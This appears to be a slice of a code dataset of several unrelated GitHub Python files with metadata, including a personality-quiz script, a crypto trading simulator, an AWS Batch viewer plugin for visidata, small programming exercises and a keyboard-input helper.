mb)\r\n\r\nque_no = 52\r\npart2()\r\nanswer_a = \" [a] Objective\"\r\nanswer_b = \" [b] Passionate\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 53\r\npart2()\r\nanswer_a = \" [a] Build\"\r\nanswer_b = \" [b] Invent\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 54\r\npart2()\r\nanswer_a = \" [a] Quiet\"\r\nanswer_b = \" [b] Gregarious\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 55\r\npart2()\r\nanswer_a = \" [a] Theory\"\r\nanswer_b = \" [b] Fact\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 56\r\npart2()\r\nanswer_a = \" [a] Compassionate\"\r\nanswer_b = \" [b] Logical\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 57\r\npart2()\r\nanswer_a = \" [a] Analytical\"\r\nanswer_b = \" [b] Sentimental\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 58\r\npart2()\r\nanswer_a = \" [a] Sensible\"\r\nanswer_b = \" [b] Facinating\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 59\r\npart3()\r\nanswer_a = \" [a] Take time to list the separate things to be done and the order of doing them\"\r\nanswer_b = \" [b] Plunge right in?\"\r\nquestion = \"When you start a big project that is due in a week, do you\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 60\r\npart3()\r\nanswer_a = \" [a] Difficult to start and maintain a conversation with some people\"\r\nanswer_b = \" [b] Easy to talk to most people for long periods of time?\"\r\nquestion = \"In social situations do you generally find it\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 61\r\npart3()\r\nanswer_a = \" [a] Do it in the accepted way\"\r\nanswer_b = \" [b] Invent a way of your own?\"\r\nquestion = \"In doing something that many other people do, does it appeal to you more to\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 62\r\npart3()\r\nanswer_a = \" [a] Right away\"\r\nanswer_b = \" [b] Only after they really get to know you?\"\r\nquestion = \"Can the new people you meet tell what you are interested in\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 63\r\npart3()\r\nanswer_a = \" [a] A person of real feeling\"\r\nanswer_b = \" [b] A consistently reasonable person\"\r\nquestion = \"Do you generally prefer courses that teach\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 64\r\npart3()\r\nanswer_a = \" [a] A person of real feeling\"\r\nanswer_b = \" [b] A consistently reasonable person?\"\r\nquestion = \"Is it a higher compliment to be called\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 65\r\npart3()\r\nanswer_a = \" [a] Necessary at times but generally unfavorable\"\r\nanswer_b = \" [b] Helpful and favorable most of the time?\"\r\nquestion = \"Do you find going by a schedule\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 66\r\npart3()\r\nanswer_a = \" [a] Talk individually with people you know well\"\r\nanswer_b = \" [b] Join in the talk of the group?\"\r\nquestion = \"When you are with a group of people, would you usually rather \\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 67\r\npart3()\r\nanswer_a = \" [a] Do much of the talking\"\r\nanswer_b = \" [b] Let others do most of the talking?\"\r\nquestion = \"At parties do you\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 68\r\npart3()\r\nanswer_a = \" [a] Appeal to you\"\r\nanswer_b = \" [b] Leave you cold?\"\r\nquestion = \"Does the idea of making a list of what you should get done over a weekend\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 69\r\npart3()\r\nanswer_a = \" [a] Competent\"\r\nanswer_b = \" [b] Compassionate?\"\r\nquestion = \"Which is a higher compliment, to be called\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 70\r\npart3()\r\nanswer_a = \" [a] Make your social engagements some distance ahead\"\r\nanswer_b = \" [b] Be free to do things on the spur of the moment\"\r\nquestion = \"Do you generally prefer to\\n\"\r\nmb = \"jp\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 71\r\npart3()\r\nanswer_a = \" [a] Figure out what needs to be done as you go along\"\r\nanswer_b = \" [b] Begin by breaking it down into steps?\"\r\nquestion = \"Overall, when working on a big assignment, do you tend to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 72\r\npart3()\r\nanswer_a = \" [a] Only with people who share some interest of yours\"\r\nanswer_b = \" [b] With almost anyone?\"\r\nquestion = \"Can you keep a conversation going indefinitely\\n\"\r\nmb = \"ie\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 73\r\npart3()\r\nanswer_a = \" [a] Support the established methods of doing good\"\r\nanswer_b = \" [b] Analyze what is still wrong and attack unsolved problems?\"\r\nquestion = \"Would you rather\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 74\r\npart3()\r\nanswer_a = \" [a] Enjoy odd or original ways of saying things\"\r\nanswer_b = \" [b] Like writers to say exactly what they mean?\"\r\nquestion = \"In reading for pleasure, do you\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 75\r\npart3()\r\nanswer_a = \" [a] Good-natured but often inconsistent\"\r\nanswer_b = \" [b] Sharp-tongued but always logical?\"\r\nquestion = \"Would you rather work under a boss (or teacher) who is\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 76\r\npart3()\r\nanswer_a = \" [a] However you feel that particular day\"\r\nanswer_b = \" [b] A set schedule?\"\r\nquestion = \"Would you prefer to do most things according to\\n\"\r\nmb = \"pj\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 77\r\npart3()\r\nanswer_a = \" [a] Talk easily to almost anyone for as long as you have to\"\r\nanswer_b = \" [b] Find a lot to say only to certain people or under certain conditions?\"\r\nquestion = \"Can you\\n\"\r\nmb = \"ei\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 78\r\npart3()\r\nanswer_a = \" [a] Weigh the facts\"\r\nanswer_b = \" [b] Consider people's feelings and opinions?\"\r\nquestion = \"When making a decision, is it more important to you to \\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 79\r\npart4()\r\nanswer_a = \" [a] Imaginative\"\r\nanswer_b = \" [b] Realistic\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 80\r\npart4()\r\nanswer_a = \" [a] Bighearted\"\r\nanswer_b = \" [b] Firm-minded\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 81\r\npart4()\r\nanswer_a = \" [a] Fair-minded\"\r\nanswer_b = \" [b] Caring\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 82\r\npart4()\r\nanswer_a = \" [a] Production\"\r\nanswer_b = \" [b] Design\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 83\r\npart4()\r\nanswer_a = \" [a] Possibilities\"\r\nanswer_b = \" [b] Certainties\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 84\r\npart4()\r\nanswer_a = \" [a] Tenderness\"\r\nanswer_b = \" [b] Strength\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 85\r\npart4()\r\nanswer_a = \" [a] Practical\"\r\nanswer_b = \" [b] Sentimental\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 86\r\npart4()\r\nanswer_a = \" [a] Make\"\r\nanswer_b = \" [b] Create\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 87\r\npart4()\r\nanswer_a = \" [a] Novel\"\r\nanswer_b = \" [b] Already Known\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ns\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 88\r\npart4()\r\nanswer_a = \" [a] Sympathize\"\r\nanswer_b = \" [b] Analyze\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 89\r\npart4()\r\nanswer_a = \" [a] Strong-willed\"\r\nanswer_b = \" [b] Tenderhearted\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 90\r\npart4()\r\nanswer_a = \" [a] Concrete\"\r\nanswer_b = \" [b] Abstract\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 91\r\npart4()\r\nanswer_a = \" [a] Devoted\"\r\nanswer_b = \" [b] Determined\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"ft\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 92\r\npart4()\r\nanswer_a = \" [a] Competent\"\r\nanswer_b = \" [b] Kindhearted\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"tf\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\nque_no = 93\r\npart4()\r\nanswer_a = \" [a] Practical\"\r\nanswer_b = \" [b] Innovative\"\r\nquestion = \"Evaluate:\\n\"\r\nmb = \"sn\"\r\nexecute(que_no, question, answer_a, answer_b, mb)\r\n\r\ndef raw_points():\r\n\tglobal e, s, t, j, i, n, f, p\r\n\tglobal preference\r\n\tprint(f\"\\n###### My Raw Points ###### \\\r\n\t\t\\nExtraversion: {e} \\\r\n \\nIntroversion: {i} \\\r\n \\n----------------- \\\r\n\t\t\\nSensing: {s} \\\r\n \\nIntuition {n} \\\r\n \\n----------------- \\\r\n\t\t\\nThinking: {t} \\\r\n \\nFeeling: {f} \\\r\n \\n----------------- \\\r\n\t\t\\nJudging: {j} \\\r\n\t\t\\nPerceiving: {p} \\\r\n\t\t\\n#######################\")\r\n\r\nprint(\"\\n########## In the event of a category TIE, use the following to break it: ##########\")\r\nprint(\"\\nTie Breakers: \\\r\n\t\\nif E or I has the same value, I wins \\\r\n\t\\nif S or N has the same value, N wins \\\r\n\t\\nif T or F has the same value, F wins \\\r\n\t\\nif J or P has the same value, P wins\")\r\n\r\nprint(\"\\n########## Clarity gives you insight on how far right or left you are within each category ##########\")\r\nprint (\"\\nClarity of Categories: \\\r\n\t\\nE or I, 11 - 13: Slight | 14 - 16: Moderate | 17 - 19: Clear | 20 - 21: Very Clear \\\r\n\t\\nS or N, 13 - 15: Slight | 16 - 20: Moderate | 21 - 24: Clear | 25 - 26: Very Clear \\\r\n\t\\nT or F, 12 - 14: Slight | 15 - 18: Moderate | 19 - 22: Clear | 23 - 24: Very Clear \\\r\n\t\\nJ or P, 11 - 13: Slight | 14 - 16: Moderate | 17 - 20: Clear | 21 - 22: Very Clear \")\r\nprint(\"\\n##################################### My info below ##########################################\")\r\n\r\npreference = []\r\n\r\n# Evaluate E and I\r\nif e > i:\r\n\tpreference.append(\"E\")\r\nif e < i:\r\n\tpreference.append(\"I\")\r\nif e == i:\r\n\tpreference.append(\"I\")\r\n\r\n# Evalute S and N\r\nif s > n:\r\n\tpreference.append(\"S\")\r\nif s < n:\r\n\tpreference.append(\"N\")\r\nif s == n:\r\n\tpreference.append(\"N\")\r\n\r\n# Evalute T and F\r\nif t > f:\r\n\tpreference.append(\"T\")\r\nif t < f:\r\n\tpreference.append(\"F\")\r\nif t == f:\r\n\tpreference.append(\"F\")\r\n\r\n# Evalute J and P\r\nif j > p:\r\n\tpreference.append(\"J\")\r\nif j < p:\r\n\tpreference.append(\"P\")\r\nif j == p:\r\n\tpreference.append(\"P\")\r\n\r\nraw_points()\r\n\r\nprint(f\"\\nMy preference is: {preference}\")\r\n","repo_name":"andreweng/insights","sub_path":"insights.py","file_name":"insights.py","file_ext":"py","file_size_in_byte":24781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35907043558","text":"import hist_service as hs\nimport datetime, time\nimport pandas as pd\nimport numpy as np\n\n\nclass CryptoFolio:\n \n #assume we \n fees = .002\n buys = 0\n sells = 0\n target_amount = 0.1\n ledger = {}\n start = 0\n def __init__(self, start_amount, coins, save_trades=False):\n self.ledger['BTC'] = start_amount\n for ix in range(len(coins)):\n self.ledger[coins[ix]] = 0.0\n self.start = start_amount\n self.hs = hs.HistWorker()\n self.save_trades = save_trades\n\n\n def buy_coin(self, c_name, price):\n amount = self.start * self.target_amount\n if(amount > self.ledger['BTC']):\n return False\n else:\n coin_amount = amount/(price* 1.01)\n the_fee = self.fees * amount\n self.ledger['BTC'] -= (amount + the_fee)\n self.ledger[c_name] += coin_amount\n self.buys += 1\n return True\n\n\n def sell_coin(self, c_name, price):\n price = price -(price*.01)\n if self.ledger[c_name] != 0.0:\n amount = self.ledger[c_name]\n self.ledger['BTC'] += ((amount*price) - ((amount * price)*self.fees))\n self.ledger[c_name] = 0.0\n self.sells += 1\n return True\n else:\n return False\n\n \n def get_total_btc_value(self, e_prices):\n \n for c in self.ledger.keys():\n if self.ledger[c] != 0.0 and c != \"BTC\":\n current_price = e_prices[c]\n self.sell_coin(c, current_price)\n return self.ledger['BTC'], self.buys, self.sells\n \n def get_total_btc_value_no_sell(self, e_prices):\n btcval = self.ledger['BTC']\n for c in self.ledger.keys():\n if self.ledger[c] != 0.0 and c != \"BTC\":\n current_price = e_prices[c]\n btc_amt = current_price * self.ledger[c]\n btcval += btc_amt\n #print(c, \" \", btc_amt)\n return btcval, self.ledger['BTC']\n\n def evaluate_output(self, out, coin, price):\n if (out == 1.0):\n self.buy_coin(coin, price)\n elif(out==.5):\n return\n else:\n self.sell_coin(price,coin)\n\n\nclass EvoSim:\n count = 0\n starting_btc = 1000\n bestNets = []\n lastGen = []\n numNets = 0\n coins = []\n market = {}\n nextGens = []\n def __init__(self, numberOfNets, coins, gens):\n self.count += 1\n self.numNets = numberOfNets\n self.coins = coins\n self.lastGen = gens\n \n def read_hist(self, coin):\n try:\n df = pd.DataFrame.read_csv(coin+'_hist.txt')\n self.market[coin] = df\n return\n except:\n print(\"no history file found\")\n return\n \n def read_all_hists(self):\n for c in self.coins:\n self.read_hist(c)\n return\n \n \n def feedNet(self, nextGens):\n for ix in range(0, len(nextGens)):\n print(ix)\n ","repo_name":"ryandemattia/TradingAI","sub_path":"crypto_evolution.py","file_name":"crypto_evolution.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29153707094","text":"# def is_AP():\n# if abs(a-b)==abs(b-c): \n# return True\n# else :\n# return False \n\n# def create_AP():\n# if is_AP==False:\n# for m in range(100):\n# if a 0 and (2*b-c)%a == 0) or (2*b-a > 0 and (2*b-a)%c == 0):\n print(\"YES\")\n else:\n print(\"NO\")\n\n \n","repo_name":"samanenasiri/Pre_ML_Exercises","sub_path":"Exercise_W2/1624B.py","file_name":"1624B.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7281247158","text":"from project.rooms.room import Room\nfrom project.rooms.young_couple_with_children import YoungCoupleWithChildren\n\n\nclass Everland:\n def __init__(self):\n self.rooms = []\n\n def add_room(self, room: Room):\n self.rooms.append(room)\n\n def get_monthly_consumptions(self):\n total = 0\n for room in self.rooms:\n total += (room.room_cost + room.expenses)\n return f\"Monthly consumption: {total:.2f}$.\"\n\n def pay(self):\n strings = []\n for room in self.rooms:\n total_expenses = room.room_cost + room.expenses\n if room.budget >= total_expenses:\n strings.append(f\"{room.family_name} paid {total_expenses:.2f}$ and have {room.budget:.2f}$ left.\")\n room.budget -= total_expenses\n else:\n strings.append(f\"{room.family_name} does not have enough budget and must leave the hotel.\")\n self.rooms.remove(room)\n return '\\n'.join(strings)\n\n def status(self):\n result = f'Total population: {sum(r.members_count for r in self.rooms)}\\n'\n for r in self.rooms:\n result += f'{r.family_name} with {r.members_count} members. Budget: {r.budget:.2f}$, Expenses: {r.expenses:.2f}$\\n'\n if r.__class__.__name__ == 'YoungCoupleWithChildren':\n for i, c in enumerate(r.children):\n result += f'--- Child {i + 1} monthly cost: {c.cost * 30:.2f}$\\n'\n result += f'--- Appliances monthly cost: {sum(a.get_monthly_expense() for a in r.appliances):.2f}$\\n'\n return result\n","repo_name":"MihailMarkovski/Python-OOP-2020","sub_path":"Exams/Exam_22_August_2020_TAKE_3/project/everland.py","file_name":"everland.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24433870753","text":"from src.validation_utils import eh_nulo_ou_vazio, valida_email, valida_CPF\n\n\nclass Cliente:\n\n def __init__(self, email: str, CPF: str, endereco: str,\n complemento: str, cidade: str,\n estado: str):\n self.set_email(email)\n self.set_CPF(CPF)\n self.set_endereco(endereco)\n self.set_complemento(complemento)\n self.set_cidade(cidade)\n self.set_estado(estado)\n\n def set_email(self, email: str) -> None:\n\n if not valida_email(email):\n raise Exception(\"Email invalido\")\n\n self.email = email\n\n def set_CPF(self, CPF: str) -> None:\n\n if not valida_CPF(CPF):\n raise Exception(\"CPF invalido\")\n\n self.CPF = CPF\n\n def set_endereco(self, endereco: str) -> None:\n\n if eh_nulo_ou_vazio(endereco):\n raise Exception(\"Endereco invalido\")\n\n self.endereco = endereco\n\n def set_complemento(self, complemento: str) -> None:\n\n if eh_nulo_ou_vazio(complemento):\n raise Exception(\"Complemento invalido\")\n\n self.complemento = complemento\n\n def set_cidade(self, cidade: str) -> None:\n\n if eh_nulo_ou_vazio(cidade):\n raise Exception(\"Cidade invalido\")\n\n self.cidade = cidade\n\n def set_estado(self, estado: str) -> None:\n\n if eh_nulo_ou_vazio(estado):\n raise Exception(\"Estado invalido\")\n\n self.estado = estado\n","repo_name":"IgorNascAlves/nossa-casa-do-codigo-fundamentos","sub_path":"src/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32783598409","text":"import visidata\nfrom datetime import datetime\nfrom visidata import date as vddate\n\n__version__ = '2020.05.28'\n\n\ndef openurl_aws(url, filetype):\n assert url.given.startswith(\"aws://\")\n path = url.given.replace(\"aws://\", \"\", 1).rstrip(\"/\")\n\n if path in {\"batch\", \"batch/jobs\"}:\n return AWSBatchJobsSheet(\"aws-batch-jobs\", source = url)\n\n # XXX TODO support aws://batch/jobs/\n # XXX TODO support aws://batch/queues\n # XXX TODO support aws://batch/queues/\n\n raise ValueError(\"Unsupported AWS resource: %s\" % url.given)\n\n\nclass AWSBatchJobsSheet(visidata.Sheet):\n \"\"\"\n Sheet with one row per AWS Batch job, across all statuses and queues.\n \"\"\"\n rowtype = \"jobs\" # rowdef: Job\n columns = [\n visidata.ColumnAttr(\"id\"),\n visidata.ColumnAttr(\"queue\"),\n visidata.ColumnAttr(\"status\"),\n visidata.ColumnAttr(\"status_reason\"),\n visidata.ColumnAttr(\"created\", type=vddate),\n visidata.ColumnAttr(\"started\", type=vddate),\n visidata.ColumnAttr(\"stopped\", type=vddate),\n visidata.ColumnAttr(\"runtime\"),\n visidata.SubColumnAttr(\"runtime\", visidata.ColumnAttr(\"seconds\", type=int), name=\"runtime_seconds\"),\n visidata.ColumnAttr(\"name\"),\n visidata.ColumnAttr(\"image\"),\n visidata.ColumnAttr(\"cmd\"),\n visidata.ColumnAttr(\"definition\"),\n visidata.ColumnAttr(\"cpus\", type=int),\n visidata.ColumnAttr(\"memory_mib\", type=int),\n ]\n\n nKeys = 1\n\n STATUSES = [\n \"SUBMITTED\",\n \"PENDING\",\n \"RUNNABLE\",\n \"STARTING\",\n \"RUNNING\",\n \"SUCCEEDED\",\n \"FAILED\",\n ]\n\n def __init__(self, name, source):\n super().__init__(name=name, source=source)\n\n # Late import to avoid requiring boto3 if this sheet/plugin is never used.\n import boto3\n self.client = boto3.client(\"batch\")\n\n @visidata.asyncthread\n def reload(self):\n self.rows = []\n\n list_queues = self.client.get_paginator(\"describe_job_queues\").paginate\n\n queues = sorted([\n queue[\"jobQueueName\"]\n for page in list_queues()\n for queue in page[\"jobQueues\"] ])\n\n loading_threads = [\n self._load_jobs(queue, status)\n for queue in queues\n for status in self.STATUSES ]\n\n # Wait for all jobs to load before sorting\n visidata.vd.sync(*loading_threads)\n\n # Sort by the existing order, if any, otherwise add an ordering.\n if self._ordering:\n self.sort()\n else:\n self.orderBy(\n self.column(\"created\"),\n self.column(\"started\"),\n reverse = True)\n\n @visidata.asyncthread\n def _load_jobs(self, queue, status):\n list_jobs = self.client.get_paginator(\"list_jobs\").paginate\n\n # Page size of 100 because that's the limit of describe_jobs(),\n # which is called inside this loop.\n for page in list_jobs(jobQueue = queue, jobStatus = status, PaginationConfig = {\"MaxItems\": 100}):\n job_ids = [ job[\"jobId\"] for job in page[\"jobSummaryList\"] ]\n\n if job_ids:\n for job in self.client.describe_jobs(jobs = job_ids)[\"jobs\"]:\n self.rows.append(Job(job))\n\n\nclass Job:\n \"\"\"\n A data class describing a single AWS Batch job, used for each row of an\n :py:class:`AWSBatchJobsSheet`.\n \"\"\"\n def __init__(self, source):\n self.id = source[\"jobId\"]\n self.name = source[\"jobName\"]\n self.queue = arn_name(source[\"jobQueue\"])\n self.status = source[\"status\"]\n self.created = timestamp(source.get(\"createdAt\"))\n self.started = timestamp(source.get(\"startedAt\"))\n self.stopped = timestamp(source.get(\"stoppedAt\"))\n self.image = source[\"container\"][\"image\"]\n self.cmd = \" \".join(source[\"container\"][\"command\"])\n self.definition = arn_name(source[\"jobDefinition\"])\n self.cpus = next((int(r[\"value\"]) for r in source[\"container\"][\"resourceRequirements\"] if r[\"type\"] == \"VCPUS\"), None)\n self.memory_mib = next((int(r[\"value\"]) for r in source[\"container\"][\"resourceRequirements\"] if r[\"type\"] == \"MEMORY\"), None)\n self.__source = source\n\n @property\n def status_reason(self):\n reason = self.__source.get(\"statusReason\")\n container_reason = self.__source.get(\"container\", {}).get(\"reason\")\n exit_code = self.__source.get(\"container\", {}).get(\"exitCode\")\n\n # Make the default/normal reason more informative\n if reason == \"Essential container in task exited\":\n if exit_code is not None:\n reason = \"exited %d\" % exit_code\n else:\n reason = \"exited\"\n\n if reason and container_reason:\n return \"%s, %s\" % (container_reason, reason)\n else:\n return reason or container_reason\n\n @property\n def runtime(self):\n if self.started:\n return (self.stopped or datetime.now().replace(microsecond=0)) - self.started\n else:\n return None\n\n\ndef timestamp(value):\n return vddate(value // 1000) if value is not None else None\n\n\ndef arn_name(arn):\n return arn.split(\":\", 5)[-1].split(\"/\", 1)[-1]\n\n\nvisidata.addGlobals({\n \"openurl_aws\": openurl_aws,\n \"AWSBatchJobsSheet\": AWSBatchJobsSheet,\n})\n","repo_name":"tsibley/visidata-plugins","sub_path":"vdaws.py","file_name":"vdaws.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35976776424","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 1 09:05:58 2019\r\n\r\n@author: klowell\r\n\"\"\"\r\n\r\n#%%\r\n##############################################################################\r\n# This is a utility program that drops variables from big csvs so that\r\n# subsequent analysis will be quicker..\r\n######################## MAIN PART OF PROGRAM ##############################\r\n# Import libraries.\r\nimport pandas as pd\r\n################## FILES AND DIRECTORIES ######################################\r\nin_path='C:/LAS_Kim/LAS_Data/LAS_Topography/'\r\nout_path='C:/LAS_Kim/LAS_Data/LAS_for_Analysis/'\r\n#file_list=['df2016_430000e_2707500n']\r\nfile_list=['df2016_430000e_2707500n','df2016_426000e_2708000n',\r\n 'df2016_420500e_2728500n','df2016_428000e_2719500n']\r\ninfile_suffix='_alltopo_w_inciangle_azimuth_chunked'\r\noutfilesuffix='_all_for_final_analysis.csv'\r\n#################### hyperparameters #################################\r\nvars2drop=['tile','flghtpth','gpstime','x','y','z','scan_angle',\r\n 'SBET_time','SBETtmdif','edge_time','edgtmdif','edgscnangl',\r\n 'SBETtime']\r\n###########################################################################\r\n# Read csv files, drop varialbes, and output.\r\nfor file in file_list:\r\n print('Reading file',file)\r\n dfin=pd.read_csv(in_path+file+infile_suffix+'.csv')\r\n dfin.drop(vars2drop,inplace=True,axis=1)\r\n print('Writing file',file+outfilesuffix,'\\n')\r\n dfin.to_csv(out_path+file+outfilesuffix,index=False)","repo_name":"KLowellNZ/IJGIS_Pulse","sub_path":"final_drop_vars.py","file_name":"final_drop_vars.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2060613606","text":"#Создаем переменную\r\nquest_number = int(input(\"Введите число \"))\r\n# концепция проекта такая: если число простое, то при делению по модулю всегда будет остаток. Если посчитать эти остатки\r\n# и сравнить их с самим числом за вычетом двух из него, то можно понять, простое оно или нет. \r\ncycle_th = quest_number - 1\r\ncounter = 0\r\ncontrol_number = quest_number - 2\r\n#Проводим базовый отвев числа\r\nif quest_number == 2:\r\n\tprint('Простое число')\r\nelif quest_number % 2 == 0:\r\n\tprint(\"Дурачок чтоли? посмотри на последнюю цифру в том, что ты нарисовал здесь!!!\")\r\nelse:\r\n#Проводим дальнейшую провеку на простоту\r\n\twhile cycle_th >= 2:\r\n\t\tmodule_num = quest_number % cycle_th\r\n\t\tcycle_th -= 1\r\n\t\tif module_num > 0:\r\n\t\t\tcounter += 1\r\n#\r\n\tif control_number - counter == 0:\r\n\t\tprint(\"Это элементарно, Ватсон - число простое\")\r\n\telse:\r\n\t\tprint(\"Число не так просто, как кажется\")\r\n#Проверял таким образом то, какие результаты у меня в переменных хранились.\r\nprint(\"Проверка: Счетчик равен \" + str(counter) + \" итератор - \" + str(cycle_th) + \" контрольная сумма равна \" + str(control_number))","repo_name":"nikonoff16/Simple_Number","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35190580822","text":"#\n#\tKeyHandler.py\n#\n#\t(c) 2021 by Andreas Kraft\n#\tLicense: BSD 3-Clause License. See the LICENSE file for further details.\n#\n#\tThese module implements a handler for keyboard inputs.\n#\tIt should run on *IX-alikes and Windows OS.\n#\n\nfrom __future__ import annotations\nimport sys, time, select\nfrom typing import Callable, Dict\n\n_timeout = 0.5\n\ntry:\n\timport tty, termios\nexcept ImportError:\n\t# Probably Windows.\n\ttry:\n\t\timport msvcrt\n\texcept ImportError:\n\t\t# FIXME what to do on other platforms?\n\t\t# Just give up here.\n\t\traise ImportError('getch not available')\n\telse:\n\t\tgetch = msvcrt.getch\t# type: ignore\n\n\t\tdef flushInput() -> None:\n\t\t\tpass\n\t\t\t# while msvcrt.kbhit():\t# type: ignore\n\t\t\t# \tmsvcrt.getch()\t\t# type: ignore\n\nelse:\n\t_errorInGetch:bool = False\n\tdef getch() -> str:\n\t\t\"\"\"getch() -> key character\n\n\t\tRead a single keypress from stdin and return the resulting character. \n\t\tNothing is echoed to the console. This call will block if a keypress \n\t\tis not already available, but will not wait for Enter to be pressed. \n\n\t\tIf the pressed key was a modifier key, nothing will be detected; if\n\t\tit were a special function key, it may return the first character of\n\t\tof an escape sequence, leaving additional characters in the buffer.\n\t\t\"\"\"\n\t\tglobal _errorInGetch\n\t\tif _errorInGetch:\t\t# getch() doesnt't fully work previously, so just return\n\t\t\treturn None\n\n\t\tfd = sys.stdin.fileno()\n\t\ttry:\n\t\t\told_settings = termios.tcgetattr(fd)\n\n\t\texcept:\n\t\t\t_errorInGetch = True\n\t\t\treturn None\n\n\t\ttry:\n\t\t\t#tty.setraw(fd)\n\t\t\ttty.setcbreak(fd)\t# Not extra lines in 